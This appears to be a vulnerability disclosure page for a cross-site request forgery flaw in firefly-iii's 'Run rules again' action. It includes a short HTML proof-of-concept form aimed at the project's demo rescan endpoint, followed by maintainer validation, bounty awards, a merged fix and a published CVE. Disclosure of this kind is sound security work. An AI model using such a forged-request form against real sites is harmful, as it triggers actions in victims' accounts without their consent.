Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Valid

Reported on

Oct 23rd 2021


Description

there is a CSRF on Run rules again action

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.firefly-iii.org/bills/rescan/2">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the firefly-iii team and are waiting to hear back a month ago
James Cole validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole confirmed that a fix has been merged on b42d8d a month ago
James Cole has been awarded the fix bounty
show.twig#L99-L129 has been validated
ShowController.php#L83-L97 has been validated
James Cole
a month ago

Maintainer


Nice find, fixed!

Jamie Slome
a month ago

Admin


CVE published! 🎊